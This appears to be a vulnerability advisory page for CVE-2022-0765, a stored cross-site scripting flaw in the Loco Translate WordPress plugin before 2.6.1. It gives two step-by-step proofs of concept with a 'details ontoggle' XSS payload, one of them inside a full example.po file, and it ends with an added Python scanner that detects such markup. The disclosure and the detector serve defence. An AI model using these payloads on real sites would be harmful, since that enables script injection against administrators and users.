Loco Translate Authenticated XSS via edit-template and example.p
Title | Published | Family |
---|---|---|
WordPress Loco Translate Cross Site Scripting | 7 Apr 2022 00:00 | packetstorm |
Cross site scripting | 18 Apr 2022 18:15 | prion |
WordPress Loco Translate plugin cross-site scripting vulnerability | 11 Apr 2022 00:00 | cnvd |
WordPress Loco Translate Plugin < 2.6.1 - Authenticated Stored Cross-Site Scripting Vulnerability | 7 Apr 2022 00:00 | zdt |
CVE-2022-0765 Loco Translate < 2.6.1 - Authenticated Stored Cross-Site Scripting | 18 Apr 2022 17:10 | cvelist |
CVE-2022-0765 | 18 Apr 2022 18:15 | cve |
CVE-2022-0765 | 18 Apr 2022 18:15 | nvd |
WordPress Loco Translate plugin <= 2.6.0 - Authenticated Stored Cross-Site Scripting (XSS) vulnerability | 22 Mar 2022 00:00 | patchstack |
Loco Translate < 2.6.1 - Authenticated Stored Cross-Site Scripting | 22 Mar 2022 00:00 | wpvulndb |
## POC1: via (edit-template)
1.) Go to the Loco Translate plugin
2.) Enter the plugin's options
3.) Enter Edit Template for any plugin
4.) Add a new message
5.) Edit the message
6.) Replace the message with the payload: `">'><details/open/ontoggle=alert('Yoho!')>`
7.) Save
8.) Replicated
## POC2: via (example.po)
1.) Go to the Loco Translate plugin
2.) Enter the plugin options for any plugin
3.) Choose the Upload PO option
4.) Load example.po
## Example.po
```po
msgid ""
msgstr ""
"Project-Id-Version: xss-tester\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2022-02-25 03:48+0000\n"
"PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE\n"
"Last-Translator: FULL NAME <EMAIL@ADDRESS>\n"
"Language-Team: \n"
"Language: \n"
"Plural-Forms: nplurals=INTEGER; plural=EXPRESSION;\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Generator: Loco https://localise.biz/\n"
"X-Loco-Version: 2.5.8; wp-5.9.1\n"
"X-Domain: xss-tester"

msgid "xss-tester"
msgstr ""

msgid "\">'><details/open/ontoggle=confirm('XSS')>"
msgstr ""
```
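
A defensive pre-import check for PO/POT files, added here as an example and not taken from the original advisory or from Loco Translate's code: it decodes each `msgid`/`msgstr`, joins continuation lines, and flags strings that carry inline event handlers or script-capable tags, as the last `msgid` in example.po does. The function names, the regex heuristic and the sample text are assumptions constructed for illustration.

```python
import re

# A PO keyword line (msgid "...", msgstr[0] "...") or a bare continuation line ("...").
_LINE = re.compile(r'^\s*(?:(msgctxt|msgid_plural|msgid|msgstr(?:\[\d+\])?)\s+)?"(.*)"\s*$')
_UNESC = {"n": "\n", "t": "\t", "r": "\r"}
# Markup a translation rarely needs: inline event handlers, script-capable tags, javascript: URIs.
_RISKY = re.compile(r'<[^>]*\bon[a-z]+\s*=|<\s*(?:script|iframe|object|embed)\b|javascript\s*:', re.I)

def _decode(raw):
    """Undo PO backslash escapes so the value is checked as the editor would render it."""
    return re.sub(r'\\(.)', lambda m: _UNESC.get(m.group(1), m.group(1)), raw)

def po_strings(text):
    """Yield (line_number, keyword, value) for each string, joining continuation lines."""
    cur = None
    for no, line in enumerate(text.splitlines(), 1):
        m = _LINE.match(line)
        if m and (m.group(1) or cur):
            if m.group(1):  # a keyword starts a new string
                if cur:
                    yield cur[0], cur[1], "".join(cur[2])
                cur = [no, m.group(1), []]
            cur[2].append(_decode(m.group(2)))
        elif cur:  # a blank line or comment ends the current string
            yield cur[0], cur[1], "".join(cur[2])
            cur = None
    if cur:
        yield cur[0], cur[1], "".join(cur[2])

def find_risky(text):
    """Return the PO strings whose decoded value contains script-capable markup."""
    return [(no, kw, val) for no, kw, val in po_strings(text) if _RISKY.search(val)]

# Constructed sample: a header, one benign entry, and the msgid from the page's example.po.
SAMPLE = r'''
msgid ""
msgstr ""
"Project-Id-Version: xss-tester\n"
"Last-Translator: FULL NAME <EMAIL@ADDRESS>\n"

msgid "Read the <a href=\"%s\">documentation</a>"
msgstr ""
"Lire la <a href=\"%s\">"
"documentation</a>"

msgid "\">'><details/open/ontoggle=confirm('XSS')>"
msgstr ""
'''
```

This is a triage heuristic, not a substitute for output escaping in the editor; the listings on this page give Loco Translate < 2.6.1 as the affected range.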